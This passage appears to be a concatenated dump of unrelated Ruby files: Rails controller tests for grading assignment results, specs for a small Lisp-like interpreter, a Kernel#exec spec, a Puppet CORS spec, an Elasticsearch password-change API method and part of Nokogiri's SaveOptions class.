"'#{path_prefix}/#{original_result.id}" +
"/update_overall_comment']"
end
          should 'edit first result' do
@result = @groupings[0].current_submission_used.get_latest_result
get_as @admin, :edit, params: { assignment_id: @assignment.id, submission_id: 1, id: @result.id }
assert_not_nil assigns(:next_grouping)
next_grouping = assigns(:next_grouping)
assert next_grouping.has_submission?
next_result = next_grouping.current_submission_used.get_latest_result
assert_not_nil next_result
assert_equal next_grouping, @groupings[1]
assert !next_result.released_to_students
assert_nil assigns(:previous_grouping)
assert_equal true, flash.empty?
assert render_template :edit
assert_response :success
end
should 'edit second result correctly' do
@result = @groupings[1].current_submission_used.get_latest_result
get_as @admin, :edit, params: { assignment_id: @assignment.id, submission_id: 1, id: @result.id }
assert_not_nil assigns(:next_grouping)
assert_not_nil assigns(:previous_grouping)
next_grouping = assigns(:next_grouping)
previous_grouping = assigns(:previous_grouping)
assert next_grouping.has_submission?
assert previous_grouping.has_submission?
next_result = next_grouping.current_submission_used.get_latest_result
previous_result = previous_grouping.current_submission_used.get_latest_result
assert_not_nil next_result
assert_not_nil previous_result
assert_equal next_grouping, @groupings[2]
assert_equal previous_grouping, @groupings[0]
assert next_result.released_to_students
assert !previous_result.released_to_students
assert_equal true, flash.empty?
assert render_template :edit
assert_response :success
end
should 'when editing third result' do
@result = @groupings[2].current_submission_used.get_latest_result
get_as @admin, :edit, params: { assignment_id: @assignment.id, submission_id: 1, id: @result.id }
assert_nil assigns(:next_grouping)
assert_not_nil assigns(:previous_grouping)
previous_grouping = assigns(:previous_grouping)
assert previous_grouping.has_submission?
previous_result = previous_grouping.current_submission_used.get_latest_result
assert_not_nil previous_result
assert_equal previous_grouping, @groupings[1]
assert !previous_result.released_to_students
assert_equal true, flash.empty?
assert render_template :edit
assert_response :success
end
end
end
context 'GET on :next_grouping' do
should 'when current grouping has submission' do
grouping = Grouping.make
result = Result.make
Grouping.any_instance.stubs(:has_submission).returns(true)
get_as @admin, :next_grouping, params: { assignment_id: @assignment.id, submission_id: 1,
grouping_id: grouping.id, id: result.id }
assert_response :redirect
end
should 'when current grouping has no submission' do
grouping = Grouping.make
result = Result.make
Grouping.any_instance.stubs(:has_submission).returns(false)
get_as @admin, :next_grouping, params: { assignment_id: @assignment.id, submission_id: 1,
grouping_id: grouping.id, id: result.id }
assert_response :redirect
end
end
should 'GET on :set_released_to_students' do
g = Grouping.make(assignment: @assignment)
s = Submission.make(grouping: g)
@result = s.get_latest_result
get_as @admin, :set_released_to_students, params: { assignment_id: @assignment.id, submission_id: 1,
id: @result.id, value: 'true' },
format: :js
assert_response :success
assert_not_nil assigns :result
end
context 'GET on :toggle_marking_state' do
setup do
# refresh the grade distribution - there's already a completed mark so far
# for each rubric type, in the following grade range:
# flexible: 6-10%
# rubric: 21-25%
g = Grouping.make(assignment: @assignment)
s = Submission.make(grouping: g)
@result = s.get_latest_result
Mark.make(criterion_type.to_sym, result: @result)
@assignment.assignment_stat.refresh_grade_distribution
@grade_distribution = @assignment.assignment_stat.grade_distribution_percentage
# convert @grade_distribution csv to an array
@grade_distribution = @grade_distribution.parse_csv.map{ |x| x.to_i }
# after the call to get_as, a second result for each marking scheme type
# will be marked as complete, a result which will be in the same grade range
# therefore we must increment the number of groupings at the given range for
# each marking scheme type
if criterion_type == 'rubric'
@grade_distribution[4] += 1
else
@grade_distribution[1] += 1
end
get_as @admin, :toggle_marking_state, params: { assignment_id: @assignment.id, submission_id: 1,
id: @result.id },
format: :js
end
should 'refresh the cached grade distribution data when the marking state is set to complete' do
@assignment.reload
actual_distribution = @assignment.assignment_stat.grade_distribution_percentage.parse_csv.map{ |x| x.to_i }
assert_equal actual_distribution, @grade_distribution
assert_not_nil assigns :result
end
should respond_with :success
end
context 'GET on :download' do
setup do
@file = SubmissionFile.new
end
should 'download without file error' do
@file.expects(:filename).once.returns('filename')
@file.expects(:retrieve_file).returns('file content')
@file.expects(:is_supported_image?).once.returns(false)
SubmissionFile.stubs(:find).returns(@file)
get_as @admin, :download, params: { assignment_id: 1, submission_id: 1, select_file_id: 1, id: 1 }
assert_equal true, flash.empty?
assert_equal response.header['Content-Type'], 'application/octet-stream'
assert_response :success
assert_equal 'file content', @response.body
end # -- without file error
should 'download with file error' do
submission = Submission.make
SubmissionFile.any_instance.expects(:retrieve_file).once.raises(Exception.new(SAMPLE_ERR_MSG))
SubmissionFile.stubs(:find).returns(@file)
@file.expects(:submission).twice.returns(
submission)
get_as @admin, :download, params: { assignment_id: 1, submission_id: 1, select_file_id: 1, id: 1 }
assert_equal flash[:file_download_error], SAMPLE_ERR_MSG
assert_response :redirect
end # -- with file error
should 'with supported image to be displayed inside browser' do
@file.expects(:filename).once.returns(
'filename.supported_image')
@file.expects(:retrieve_file).returns('file content')
@file.expects(:is_supported_image?).once.returns(true)
SubmissionFile.stubs(:find).returns(@file)
get_as @admin, :download, params: { assignment_id: 1, submission_id: 1, id: 1, select_file_id: 1,
show_in_browser: true }
assert_equal response.header['Content-Type'], 'image'
assert_response :success
assert_equal 'file content', @response.body
end # -- with supported image to be displayed in browser
end
context 'GET on :download_zip' do
setup do
@group = Group.make
@student = Student.make
@grouping = Grouping.make(group: @group,
assignment: @assignment)
@membership = StudentMembership.make(user: @student,
membership_status: 'inviter',
grouping: @grouping)
@student = @membership.user
@file1_name = 'TestFile.java'
@file1_content = "Some contents for TestFile.java\n"
@group.access_repo do |repo|
txn = repo.get_transaction('test')
path = File.join(@assignment.repository_folder, @file1_name)
txn.add(path, @file1_content, '')
repo.commit(txn)
# Generate submission
@submission = Submission.
generate_new_submission(@grouping, repo.get_latest_revision)
end
@annotation = TextAnnotation.new
@file = SubmissionFile.find_by_submission_id(@submission.id)
@annotation.
update_attributes({ line_start: 1,
line_end: 2,
submission_file_id: @file.id,
is_remark: false,
annotation_number: @submission.
annotations.count + 1
})
@annotation.annotation_text = AnnotationText.make
@annotation.save
end
should 'download in zip all files with annotations' do
get_as @admin, :download_zip,
assignment_id: @assignment.id,
submission_id: @submission.id,
id: @submission.id,
grouping_id: @grouping.id,
include_annotations: 'true'
assert_equal 'application/zip', response.header['Content-Type']
assert_response :success
zip_path = "tmp/#{@assignment.short_identifier}_" +
"#{@grouping.group.group_name}_r#{@grouping.group.repo.
get_latest_revision.revision_identifier}_ann.zip"
Zip::File.open(zip_path) do |zip_file|
file1_path = File.join("#{@assignment.repository_folder}-" +
"#{@grouping.group.repo_name}",
@file1_name)
assert_not_nil zip_file.find_entry(file1_path)
assert_equal @file.retrieve_file(true), zip_file.read(file1_path)
end
end
should 'download in zip all files without annotations' do
get_as @admin, :download_zip, params: { assignment_id: @assignment.id, submission_id: @submission.id,
id: @submission.id, grouping_id: @grouping.id,
include_annotations: 'false' }
assert_equal 'application/zip', response.header['Content-Type']
assert_response :success
zip_path = "tmp/#{@assignment.short_identifier}_" +
"#{@grouping.group.group_name}_r#{@grouping.group.repo.
get_latest_revision.revision_identifier}.zip"
Zip::File.open(zip_path) do |zip_file|
file1_path = File.join("#{@assignment.repository_folder}-" +
"#{@grouping.group.repo_name}",
@file1_name)
assert_not_nil zip_file.find_entry(file1_path)
assert_equal @file.retrieve_file, zip_file.read(file1_path)
end
end
end
context 'GET on :update_mark' do
setup do
g = Grouping.make(assignment: @assignment)
@submission = Submission.make(grouping: g)
@mark = Mark.make(criterion_type.to_sym, result: @submission.get_latest_result)
@result = @mark.result
end
        should 'fail validation' do
ActiveModel::Errors.any_instance.stubs(
:full_messages).returns([SAMPLE_ERR_MSG])
get_as @admin, :update_mark, params: { assignment_id: @assignment.id, submission_id: 1, id: @mark.result.id,
mark_id: @mark.id, mark: 'something' },
format: :js
assert_match "0.0,0.0,0.0", @response.body
end
should 'with save error' do
@mark.expects(:save).once.returns(false)
Mark.stubs(:find).once.returns(@mark)
ActiveModel::Errors.any_instance.stubs(:full_messages).returns([SAMPLE_ERR_MSG])
get_as @admin, :update_mark, params: { assignment_id: @assignment.id, submission_id: 1, id: @mark.result.id,
mark_id: 1, mark: 1 }
assert_response :bad_request
assert_match Regexp.new(SAMPLE_ERR_MSG), @response.body
end
should 'without save error' do
get_as @admin, :update_mark, params: { assignment_id: @assignment.id, submission_id: 1, id: @mark.result.id,
mark_id: @mark.id, mark: 1 },
format: :js
assert_response :success
end
should 'GET on :view_marks' do
get_as @admin, :view_marks, params: { assignment_id: @assignment.id, submission_id: @submission.id,
id: @result.id }
assert_response 200
end
should 'GET on :add_extra_mark' do
get_as @admin, :add_extra_mark, params: { assignment_id: 1, submission_id: @submission.id,
id: @submission.get_latest_result.id },
format: :js
assert_not_nil assigns :result
assert render_template 'results/marker/add_extra_mark'
assert_response :success
end
context 'POST on :add_extra_mark' do
should 'with save error' do
extra_mark = ExtraMark.new
ExtraMark.expects(:new).once.returns(extra_mark)
extra_mark.expects(:save).once.returns(false)
post_as @admin, :add_extra_mark, params: { assignment_id: 1, submission_id: @submission.id,
id: @submission.get_latest_result.id,
extra_mark: { extra_mark: 1 } },
format: :js
assert_not_nil assigns :result
assert_not_nil assigns :extra_mark
assert_response :success
end
should 'without save error' do
@submission.get_latest_result.update_total_mark
@old_total_mark = @submission.get_latest_result.total_mark
post_as @admin, :add_extra_mark, params: { assignment_id: 1, submission_id: @submission.id,
id: @submission.get_latest_result.id,
extra_mark: { extra_mark: 1 } },
format: :js
assert_not_nil assigns :result
assert_not_nil assigns :extra_mark
assert render_template 'results/marker/insert_extra_mark'
assert_response :success
@submission.get_latest_result.reload
assert_equal @old_total_mark + 1, @submission.get_latest_result.total_mark
end
end
end
should 'GET on :remove_extra_mark' do
@result = Result.make
(3..4).each do |extra_mark_value|
@extra_mark = ExtraMark.new
@extra_mark.unit = ExtraMark::POINTS
@extra_mark.result = @result
@extra_mark.extra_mark = extra_mark_value
assert @extra_mark.save
end
@result.update_total_mark
@old_total_mark = @result.total_mark
get_as @admin,
:remove_extra_mark,
params: { assignment_id: 1, submission_id: 1, id: @extra_mark.id },
format: :js
assert_equal true, flash.empty?
assert_not_nil assigns :result
assert render_template 'results/marker/remove_extra_mark'
assert_response :success
@result.reload
assert_equal @old_total_mark - @extra_mark.extra_mark, @result.total_mark
end
should 'POST on :update_overall_comment' do
@result = Result.make
@overall_comment = 'A new overall comment!'
post_as @admin,
:update_overall_comment,
params: { assignment_id: @assignment.id, submission_id: 1, id: @result.id,
result: { overall_comment: @overall_comment } }
@result.reload
assert_equal @result.overall_comment, @overall_comment
end
end
end
end # An authenticated and authorized admin doing a
context 'A TA' do
{setup_ta_flexible: 'flexible',
setup_ta_rubric: 'rubric'}.each do |setup_method, criterion_type|
context "Using #{criterion_type} and doing a" do
setup do
@ta = Ta.make
@assignment = Assignment.make
@grouping = Grouping.make(assignment: @assignment)
@submission = Submission.make(grouping: @grouping)
@result = @grouping.submissions.first.get_latest_result
end
should 'GET on :edit' do
result = Result.make
get_as @ta,
:edit,
assignment_id: @assignment.id,
submission_id: 1,
id: result.id
assert_equal true, flash.empty?
assert render_template :edit
assert_response :success
end
context 'GET on :next_grouping' do
should 'when current grouping has submission' do
result = Result.make
grouping = Grouping.make
Grouping.any_instance.stubs(:has_submission).returns(true)
get_as @ta,
:next_grouping,
assignment_id: @assignment.id,
submission_id: 1,
grouping_id: grouping.id,
id: result.id
assert_response :redirect
end
should 'when current grouping has no submission' do
result = Result.make
grouping = Grouping.make
Grouping.any_instance.stubs(:has_submission).returns(false)
get_as @ta,
:next_grouping,
assignment_id: @assignment.id,
submission_id: 1,
grouping_id: grouping.id,
id: result.id
assert_response :redirect
end
end
should 'GET on :set_released_to_students' do
result = Result.make
grouping = Grouping.make
get_as @ta,
:set_released_to_students,
assignment_id: 1,
submission_id: 1,
grouping_id: grouping.id,
id: result.id
assert_response :missing
assert render_template 404
end
should 'GET on :toggle_marking_state' do
result = Result.make
grouping = Grouping.make
get_as @ta,
:toggle_marking_state,
format: :js,
assignment_id: @assignment.id,
submission_id: 1,
grouping_id: grouping.id,
id: result.id
assert_response :success
assert_not_nil assigns :result
end
context 'GET on :download' do
setup do
@file = SubmissionFile.new
end
should 'without file error' do
@file.expects(:filename).once.returns('filename')
@file.expects(:is_supported_image?).once.returns(false)
@file.expects(:retrieve_file).once.returns('file content')
SubmissionFile.stubs(:find).returns(@file)
get_as @ta,
:download,
assignment_id: 1,
submission_id: 1,
id: 1,
select_file_id: 1
assert_equal true, flash.empty?
assert_equal 'application/octet-stream', response.header['Content-Type']
assert_response :success
assert_equal 'file content', @response.body
end
should 'with file error' do
submission = Submission.make
result = Result.make
submission.expects(:get_latest_result).once.returns(result)
@file.expects(:submission).twice.returns(submission)
@file.expects(:retrieve_file).once.raises(
Exception.new(SAMPLE_ERR_MSG))
SubmissionFile.stubs(:find).returns(@file)
get_as @ta,
:download,
assignment_id: 1,
submission_id: 1,
id: 1,
select_file_id: 1
assert_equal flash[:file_download_error], SAMPLE_ERR_MSG
assert_response :redirect
end
should 'with supported image to be displayed inside browser' do
@file.expects(:filename).once.returns('filename.supported_image')
@file.expects(:is_supported_image?).once.returns(true)
@file.expects(:retrieve_file).returns('file content')
SubmissionFile.stubs(:find).returns(@file)
get_as @ta,
:download,
assignment_id: 1,
submission_id: 1,
id: 1,
select_file_id: 1,
show_in_browser: true
assert_equal true, flash.empty?
assert_equal response.header['Content-Type'], 'image'
assert_response :success
assert_equal 'file content', @response.body
end
end
context 'GET on :update_mark' do
setup do
@mark = Mark.make
end
          should 'fail validation' do
ActiveModel::Errors.any_instance.stubs(:full_messages).returns([SAMPLE_ERR_MSG])
get_as @ta,
:update_mark,
format: :js,
assignment_id: @assignment.id,
submission_id: 1,
id: @mark.result.id,
mark_id: @mark.id,
mark: 'something'
assert_match "0.0,0.0,0.0", @response.body
end
should 'without save error' do
get_as @ta,
:update_mark,
format: :js,
assignment_id: @assignment.id,
submission_id: 1,
id: @mark.result.id,
mark_id: @mark.id,
mark: 1
assert render_template 'results/marker/_update_mark.rjs'
assert_response :success
end
end # -- GET on :update_mark
should 'GET on :view_marks' do
get_as @ta,
:view_marks,
assignment_id: @assignment.id,
submission_id: @submission.id,
id: @result.id
assert_response 200
end # -- GET on :view_marks
should 'GET on :add_extra_mark' do
incomplete_result = Result.make
get_as @ta,
:add_extra_mark,
format: :js,
assignment_id: 1,
submission_id: 1,
id: incomplete_result.id
assert_not_nil assigns :result
assert render_template 'results/marker/add_extra_mark'
assert_response :success
end
context 'POST on :add_extra_mark' do
setup do
@incomplete_result = Result.make
end
should 'with save error' do
extra_mark = ExtraMark.new
ExtraMark.expects(:new).once.returns(extra_mark)
extra_mark.expects(:save).once.returns(false)
post_as @ta,
:add_extra_mark,
format: :js,
assignment_id: 1,
submission_id: 1,
id: @incomplete_result.id,
extra_mark: {extra_mark: 1}
assert_not_nil assigns :result
assert_not_nil assigns :extra_mark
assert render_template 'results/marker/add_extra_mark_error'
assert_response :success
end # -- with save error
should 'without save error' do
@incomplete_result.update_total_mark
@old_total_mark = @incomplete_result.total_mark
post_as @ta,
:add_extra_mark,
format: :js,
assignment_id: 1,
submission_id: 1,
id: @incomplete_result.id,
extra_mark: {extra_mark: 1}
assert_not_nil assigns :result
assert_not_nil assigns :extra_mark
assert render_template 'results/marker/insert_extra_mark'
assert_response :success
@incomplete_result.reload
assert_equal @old_total_mark + 1, @incomplete_result.total_mark
end
end
should 'GET on :remove_extra_mark' do
# create and save extra marks
@result = Result.make
(3..4).each do |extra_mark_value|
@extra_mark = ExtraMark.new
@extra_mark.unit = ExtraMark::POINTS
@extra_mark.result = @result
@extra_mark.extra_mark = extra_mark_value
assert @extra_mark.save
end
@result.update_total_mark
@old_total_mark = @result.total_mark
get_as @ta,
:remove_extra_mark,
format: :js,
assignment_id: 1,
submission_id: 1,
id: @extra_mark.id
assert_equal true, flash.empty?
assert_not_nil assigns :result
assert render_template 'results/marker/remove_extra_mark'
assert_response :success
@result.reload
assert_equal @old_total_mark - @extra_mark.extra_mark,
@result.total_mark
end
should 'POST on :update_overall_comment' do
@overall_comment = 'A new overall comment!'
@result = Result.make
post_as @ta,
:update_overall_comment,
assignment_id: @assignment.id,
submission_id: 1,
id: @result.id,
result: {overall_comment: @overall_comment}
@result.reload
assert_equal @result.overall_comment, @overall_comment
end
end
end
end # An authenticated and authorized TA doing a
end
| 42.33815 | 120 | 0.566592 |
28fd43f16db8935a87bd01410d0b407ac42d3363 | 3,914 | module Ruspea::Language
RSpec.describe Core do
subject(:core) { described_class.new }
let(:reader) { Ruspea::Interpreter::Reader.new }
let(:evaler) { Ruspea::Interpreter::Evaler.new }
let(:list) { Ruspea::Runtime::List }
let(:sym) { Ruspea::Runtime::Sym }
let(:form) { Ruspea::Interpreter::Form }
let(:user_env) { Ruspea::Runtime::Env.new(core) }
context "quote" do
it "allows quotation of symbols" do
# (quote omg)
quotation = form.new(list.create(
form.new(sym.new("quote")),
form.new(sym.new("omg"))
))
result = evaler.call(quotation, context: core)
expect(result).to eq sym.new("omg")
end
it "allows quotation of lists" do
# (quote (1 2))
quotation = form.new(list.create(
form.new(sym.new("quote")),
form.new(
list.create(1, 2)
)
))
result = evaler.call(quotation, context: core)
expect(result).to eq list.create(1, 2)
end
end
context "def" do
it "defines a value associated with a symbol in the caller context" do
definition = form.new(list.create(
form.new(sym.new("def")),
form.new(sym.new("lol")),
form.new(420)
))
user_env = Ruspea::Runtime::Env.new(core)
evaler.call(definition, context: user_env)
expect(user_env.lookup(Ruspea::Runtime::Sym.new("lol"))).to eq 420
      # ensure the external context is not polluted:
expect {
core.lookup(Ruspea::Runtime::Sym.new("lol"))
}.to raise_error Ruspea::Error::Resolution
end
end
context "cond" do
it "returns evaluates the expression for the first 'true' tuple" do
code = <<~code
(cond
(false 1)
(false 2)
(false 3)
(true (def lol 420) lol)
(true 5))
code
_, forms = reader.call(code)
expect(evaler.call(forms.last, context: user_env)).to eq 420
end
it "returns nil if no test is 'true'" do
code = <<~code
(cond
(false 1)
(false 2)
(false 3))
code
_, forms = reader.call(code)
expect(evaler.call(forms.last, context: user_env)).to eq nil
end
end
context "::" do
it "constanize single elements" do
_, forms = reader.call("(:: Kernel)")
expect(evaler.call(forms.first, context: user_env)).to eq Kernel
end
it "constanize namespaced elements" do
_, forms = reader.call("(:: Ruspea::Runtime::List)")
expect(evaler.call(forms.first, context: user_env)).to eq list
end
end
context "." do
it "sends a method to any object" do
_, forms = reader.call('(. "lol" upcase)')
expect(evaler.call(forms.first, context: user_env)).to eq "LOL"
end
it "sends parameters to a object" do
code = [
'(def str "bbq")',
'(. "lol" << str)',
"(. 1 + 1)",
"(. [] << 'bbq)"
].join("\n")
_, forms = reader.call(code)
expect(evaler.call(forms, context: user_env)).to eq [
"bbq", "lolbbq", 2, [sym.new("bbq")]]
end
it "sends parameters to objects" do
code = [
'(def str "bbq")',
'(. (:: String) new "lol")',
'(. (. (:: Array) new) << (. 1 + 2))',
'(. (:: Kernel) print str)'
].join("\n")
_, forms = reader.call(code)
result = nil
expect {
result = evaler.call(forms, context: user_env)
}.to output("bbq").to_stdout
expect(result).to eq ["bbq", "lol", [3], nil]
end
end
context "rsp core" do
it "loads rsp core" do
expect { user_env.lookup(sym.new("puts")) }.to_not raise_error
end
end
end
end
| 27.370629 | 76 | 0.525805 |
f8bd52e8f6a38b12a0bdca41cf7227b114f8bc39 | 448 | class CreateInfoSources < ActiveRecord::Migration
def self.up
create_table :info_sources, :force=>true do |t|
t.column :code, :string, :null=>false
t.column :title, :string
t.column :agent, :string
t.column :date_published, :date
t.timestamps
end
add_index :info_sources, :code, :unique=>true
end
def self.down
remove_index :info_sources, :code
drop_table :info_sources
end
end | 23.578947 | 51 | 0.65625 |
5da14740f6bc7ff5cb7c62fe4d55e5a31d660bc6 | 726 | require File.dirname(__FILE__) + '/../../spec_helper'
require File.dirname(__FILE__) + '/fixtures/classes'
describe "Kernel#exec" do
it "is a private method" do
Kernel.should have_private_instance_method(:exec)
end
it "raises a SystemCallError if cmd cannot execute" do
lambda { exec "" }.should raise_error(SystemCallError)
end
it 'can call bat files' do
ruby_exe("exec '#{File.dirname(__FILE__) + "/fixtures/comspec.bat"} success'").chomp.should == 'success'
end
it 'can call cmd files' do
ruby_exe("exec '#{File.dirname(__FILE__) + "/fixtures/comspec.cmd"} success'").chomp.should == 'success'
end
end
describe "Kernel.exec" do
it "needs to be reviewed for spec completeness"
end
| 29.04 | 108 | 0.702479 |
18d8ccae165a91f8f1a4e7b2e8d15d94fdbce6ae | 1,596 | require 'spec_helper'
describe 'ironic::inspector::cors' do
shared_examples_for 'ironic inspector cors' do
it 'configure cors default params' do
is_expected.to contain_oslo__cors('ironic_inspector_config').with(
:allowed_origin => '<SERVICE DEFAULT>',
:allow_credentials => '<SERVICE DEFAULT>',
:expose_headers => '<SERVICE DEFAULT>',
:max_age => '<SERVICE DEFAULT>',
:allow_methods => '<SERVICE DEFAULT>',
:allow_headers => '<SERVICE DEFAULT>')
end
context 'with specific parameters' do
let :params do
{ :allowed_origin => '*',
:allow_credentials => true,
:expose_headers => 'Content-Language,Expires',
:max_age => 3600,
:allow_methods => 'GET,POST,PUT,DELETE,OPTIONS',
:allow_headers => 'Content-Type,Cache-Control',
}
end
it 'configure cors params' do
is_expected.to contain_oslo__cors('ironic_inspector_config').with(
:allowed_origin => '*',
:allow_credentials => true,
:expose_headers => 'Content-Language,Expires',
:max_age => 3600,
:allow_methods => 'GET,POST,PUT,DELETE,OPTIONS',
:allow_headers => 'Content-Type,Cache-Control')
end
end
end
on_supported_os({
:supported_os => OSDefaults.get_supported_os
}).each do |os,facts|
context "on #{os}" do
let (:facts) do
facts.merge!(OSDefaults.get_facts())
end
it_configures 'ironic inspector cors'
end
end
end
| 30.113208 | 74 | 0.592105 |
871a311e467657e1efad63e97d12083f3e545819 | 621 | class CreateSchoolBattles < ActiveRecord::Migration[5.1]
def change
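    # UUID primary keys generated by uuid_generate_v4() (this assumes the
    # uuid-ossp Postgres extension is already enabled in the database).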
opts = { id: :uuid, default: -> { "uuid_generate_v4()" } }
create_table :school_battles, opts do |t|
t.string :event_name, null: false, default: ''
t.string :course, null: false
t.date :started_date, null: false
t.date :finished_date, null: false
t.timestamps
end
create_table :battle_schools, opts do |t|
t.uuid :school_battle_id, null: false
t.uuid :school_id, null: false
t.timestamps
end
add_index :battle_schools, [:school_battle_id, :school_id], unique: true
end
end
| 27 | 76 | 0.657005 |
612459e104f3a491395f22a0d465991ac7c310e0 | 2,207 | require 'spec_helper'
describe Listen do
describe '#to' do
let(:listener) { mock(Listen::Listener) }
let(:listener_class) { Listen::Listener }
before { listener_class.stub(:new => listener) }
context 'with one path to listen to' do
context 'without options' do
it 'creates an instance of Listener' do
listener_class.should_receive(:new).with('/path')
described_class.to('/path')
end
end
context 'with options' do
it 'creates an instance of Listener with the passed params' do
listener_class.should_receive(:new).with('/path', :filter => '**/*')
described_class.to('/path', :filter => '**/*')
end
end
context 'without a block' do
it 'returns the listener' do
described_class.to('/path', :filter => '**/*').should eq listener
end
end
context 'with a block' do
it 'starts the listener after creating it' do
listener.should_receive(:start)
described_class.to('/path', :filter => '**/*') { |modified, added, removed| }
end
end
end
context 'with multiple paths to listen to' do
context 'without options' do
it 'creates an instance of Listener' do
listener_class.should_receive(:new).with('path1', 'path2')
described_class.to('path1', 'path2')
end
end
context 'with options' do
it 'creates an instance of Listener with the passed params' do
listener_class.should_receive(:new).with('path1', 'path2', :filter => '**/*')
described_class.to('path1', 'path2', :filter => '**/*')
end
end
context 'without a block' do
it 'returns a Listener instance created with the passed params' do
described_class.to('path1', 'path2', :filter => '**/*').should eq listener
end
end
context 'with a block' do
it 'starts a Listener instance after creating it with the passed params' do
listener.should_receive(:start)
described_class.to('path1', 'path2', :filter => '**/*') { |modified, added, removed| }
end
end
end
end
end
| 32.455882 | 96 | 0.590847 |
2188888069d6ca87f1593c4c206d847333eb6b34 | 574 | # typed: true
module KubeDSL::DSL::V1
class PodTemplateSpec < ::KubeDSL::DSLObject
object_field(:metadata) { KubeDSL::DSL::Meta::V1::ObjectMeta.new }
object_field(:spec) { KubeDSL::DSL::V1::PodSpec.new }
validates :metadata, object: { kind_of: KubeDSL::DSL::Meta::V1::ObjectMeta }
validates :spec, object: { kind_of: KubeDSL::DSL::V1::PodSpec }
def serialize
{}.tap do |result|
result[:metadata] = metadata.serialize
result[:spec] = spec.serialize
end
end
def kind_sym
:pod_template_spec
end
end
end
| 24.956522 | 80 | 0.646341 |
ed2c04c4b09bcd85afde8e026bfa902b7d27903f | 304 | # Copyright (c) Universidade Federal Fluminense (UFF).
# This file is part of SAPOS. Please, consult the license terms in the LICENSE file.
require 'test_helper'
class EnrollmentStatusTest < ActiveSupport::TestCase
# Replace this with your real tests.
test "the truth" do
assert true
end
end
| 25.333333 | 84 | 0.753289 |
1adafeb7706d5ea582873a48c98c1ed845d60370 | 500 | # frozen_string_literal: true
require 'vk/api/responses'
module Vk
module API
class Video < Vk::Schema::Namespace
module Responses
# @see https://github.com/VKCOM/vk-api-schema/blob/master/objects.json
class AddResponse < Vk::Schema::Response
# @return [API::Base::OkResponse] @see https://github.com/VKCOM/vk-api-schema/blob/master/objects.json
attribute :response, API::Base::OkResponse.optional.default(nil)
end
end
end
end
end
| 29.411765 | 112 | 0.67 |
b967130baacdc8e1ed477b778a42c825df23e89f | 628 | # Test-only pub/sub API that sense whether events have been published without
# actually contacting a remote service.
class SpyPubSubApi
attr_reader :publish_history
def initialize
@publish_history = []
end
  # Pretends to publish an event to a channel using the Pub/Sub system.
#
# @param [String] channel a single channel name that the event is to be published on
# @param [String] event - the name of the event to be triggered
# @param [Hash] data - the data to be sent with the event
def publish(channel, event, data)
@publish_history.push({channel: channel, event: event, data: data})
end
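
  # Usage sketch (illustrative; the channel/event names and data below are
  # hypothetical, not part of this API):
  #
  #   spy = SpyPubSubApi.new
  #   spy.publish('progress', 'level_complete', {user_id: 1})
  #   spy.publish_history
  #   # => [{channel: 'progress', event: 'level_complete', data: {user_id: 1}}]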
end
| 33.052632 | 86 | 0.729299 |
f82ab71b6ce08977c7c5092eae93de1118e44b40 | 2,012 | # Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
module Elasticsearch
module XPack
module API
module Security
module Actions
# Change the password of a user
#
# @option arguments [String] :username The username of the user to change the password for
# @option arguments [Hash] :body the new password for the user (*Required*)
# @option arguments [Boolean] :refresh Refresh the index after performing the operation
#
# @see https://www.elastic.co/guide/en/x-pack/current/security-api-change-password.html
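          #
          # @example Change a user's password (illustrative sketch with example values; assumes a configured client with the X-Pack APIs mixed in)
          #   client.xpack.security.change_password(
          #     username: 'jacknich',
          #     body: { password: 'new-password' }
          #   )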
#
def change_password(arguments={})
raise ArgumentError, "Required argument 'body' missing" unless arguments[:body]
valid_params = [ :refresh ]
arguments = arguments.clone
username = arguments.delete(:username)
method = Elasticsearch::API::HTTP_PUT
path = Elasticsearch::API::Utils.__pathify "_xpack/security/user/", username, "/_password"
params = Elasticsearch::API::Utils.__validate_and_extract_params arguments, valid_params
body = arguments[:body]
perform_request(method, path, params, body).body
end
end
end
end
end
end
| 38.692308 | 104 | 0.680915 |
ed40c33ad23bcf20621058f9c5645594926a3322 | 1,184 | # Unlight
# Copyright(c)2019 CPA
# This software is released under the MIT License.
# http://opensource.org/licenses/mit-license.php
module Unlight
  # Inventory class for parts
class MonsterTreasureInventory < Sequel::Model
    # Associations with other classes
    many_to_one :cpu_card_data # has an avatar
    many_to_one :treasure_data # has avatar parts
plugin :validation_class_methods
plugin :hook_class_methods
    # Pre-processing before insert
before_create do
self.created_at = Time.now.utc
end
    # Pre-processing before insert and update
before_save do
self.updated_at = Time.now.utc
end
SLOTS2REWARD = [Unlight::Reward::WEAPON_CARD, 0, Unlight::Reward::EVENT_CARD]
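
    # Builds the reward tuple for this inventory entry:
    # { step: <quest step>, item: [<reward type>, <value>, <count>] }.
    # Falls back to a zeroed tuple when no treasure data is attached or the
    # slot type has no mapped reward.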
def get_treasure
ret = { step: 0, item: [0, 0, 0] }
t = treasure_data
if t
case t.treasure_type
when TG_CHARA_CARD
ret = { step: step, item: [Unlight::Reward::RANDOM_CARD, t.value, num] }
when TG_SLOT_CARD
ret = { step: step, item: [SLOTS2REWARD[t.slot_type], t.value, num] } unless (SLOTS2REWARD[t.slot_type]).zero?
when TG_AVATAR_ITEM
ret = { step: step, item: [Unlight::Reward::ITEM, t.value, num] }
end
end
ret
end
end
end
| 26.311111 | 120 | 0.650338 |
f852e6071e626a5c3e38605f3d7e858c23fae9f3 | 1,053 | module Nokogiri
module XML
class Node
###
# Save options for serializing nodes
class SaveOptions
# Format serialized xml
FORMAT = 1
        # Do not include declarations
NO_DECLARATION = 2
# Do not include empty tags
NO_EMPTY_TAGS = 4
# Do not save XHTML
NO_XHTML = 8
# Save as XHTML
AS_XHTML = 16
# Save as XML
AS_XML = 32
# Save as HTML
AS_HTML = 64
# Integer representation of the SaveOptions
attr_reader :options
# Create a new SaveOptions object with +options+
def initialize options = 0; @options = options; end
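
        # For each flag constant, dynamically define a chainable setter
        # (e.g. #format) that ORs the flag into @options and returns self,
        # plus a predicate (e.g. #format?) that reports whether the flag is set.
        #
        # Usage sketch (illustrative):
        #   SaveOptions.new.as_xml.format.format? # => true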
constants.each do |constant|
class_eval %{
def #{constant.downcase}
@options |= #{constant}
self
end
def #{constant.downcase}?
